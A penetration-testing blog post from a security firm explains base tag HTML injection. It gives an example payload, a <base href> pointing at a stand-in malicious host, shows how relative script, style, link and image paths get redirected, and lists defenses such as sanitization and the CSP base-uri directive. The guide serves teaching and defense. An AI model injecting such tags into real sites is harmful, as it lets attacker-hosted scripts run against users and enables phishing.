Base tag HTML injection: A guide for pentesters

Blog banner image

We’re diving deep into a lesser-discussed variant of HTML injection that isn’t very well known at all, Base Tag Injection.


What is Base Tag Injection?

The HTML <base> tag specifies the base URL for all relative URLs in a document. It’s a powerful feature that simplifies document editing and management, but in the wrong hands, it becomes a tool for web-based skullduggery.

What are relative urls?

A relative URL specifies the path to a resource in relation to the current page’s URL, rather than providing a complete path from the protocol down to the resource, which is known as an absolute URL. This shorthand approach makes it easier to link to resources within the same website without specifying the full URL each time. For example, if a document located at https://example.com/folder/page.html contains a link with the relative URL image.jpg, the browser interprets this as https://example.com/folder/image.jpg.

By injecting a malicious base URL, an attacker can redirect all relative resource links, such as scripts, stylesheets, and anchor tags, to a domain they control. This can lead to a variety of attacks, including phishing, session hijacking, and cross-site scripting (XSS). Rather than deliver an XSS payload into one place, the attacker can control every item that’s imported on the page. Typically, there’s a lot!

The Attack Vector

Imagine a simple scenario: a comment section of a website that fails to sanitize input properly and allows base tags through.

An attacker submits a post containing the following snippet:

<base href="https://malicious.example/" />

Suddenly, every relative URL within the page (after the base tag) points to https://malicious.example/<something>.

This could include:

  • Script tags: Leading to the execution of malicious JavaScript.

    <script src="/static/script.js">
    becomes
    https://malicious.example/static/script.js

  • Link tags: Applying external CSS to phish or deceive users.

    <link rel="stylesheet" href="/static/styles.css">
    becomes
    https://malicious.example/static/styles.css

  • Anchor tags: Redirecting clicks to phishing sites or malware downloads.

    <a href="/contact.html"> contact us </a>
    becomes
    https://malicious.example/contact.html

  • Img tags: Potentially allowing an attacker to steal customer information or serve malicious images.

    <img src="/static/background.png">
    becomes
    https://malicious.example/static/background.png

Exploiting Base Tag Injection

To exploit this vulnerability, an attacker needs to:

  1. Identify a target: A site allowing user-generated content without proper input sanitization.
  2. Inject the base tag: Submit content or a comment including the <base> tag with a malicious URL.
  3. Leverage relative URLs: Deploy scripts, styles, or deceptive links from the controlled domain.
Real-world Implications

The implications of base tag injection are far-reaching:

  • Phishing: Users can be redirected to fake login pages, tricking them into revealing sensitive information.
  • Malware Distribution: Malicious scripts can be injected into pages, leading to malware downloads.
  • Scams: Your website is defaced to trick users into handing over their payment details.
  • Data Exfiltration: Cross-site scripting facilitated by base tag injection can lead to data breaches.
Defense Strategies

Protecting against base tag injection involves several layers of defense:

  • Input Sanitization: Ensure all user input is sanitized, stripping or escaping tags like <base>.
  • Content Security Policy (CSP): Implement a CSP to control the sources from which resources can be loaded, mitigating the effects of a successful injection. There is a specific base-uri directive!
  • Secure Coding Practices: Educate developers on the risks and signs of injection vulnerabilities.
  • Automation i.e DevSecOps: Tools like SAST and DAST can test for these conditions and let developers know before they ever make the code live.
Conclusion

Base tag injection is a niche vulnerability, but one that has been found in the wild countless times. Public disclosure reports can be found online on HaCkerOne and other bug bounty platforms. This vector may not grab headlines like SQL injection or XSS, but its potential for harm is comparable.

Base tag injection should be on every web application penetration tester’s radar.

We provide penetration testing services. Read more about our Web Penetration tests, or our full suite of assessments.

For more information, email us at [email protected] or call us on 0161 660 3545

Author

Simon Gurney

Simon Gurney

- CTO -

Simon is one of the Punk Security Directors and has over 17 years experience working within IT, primarily focused on automation and InfoSec.

read more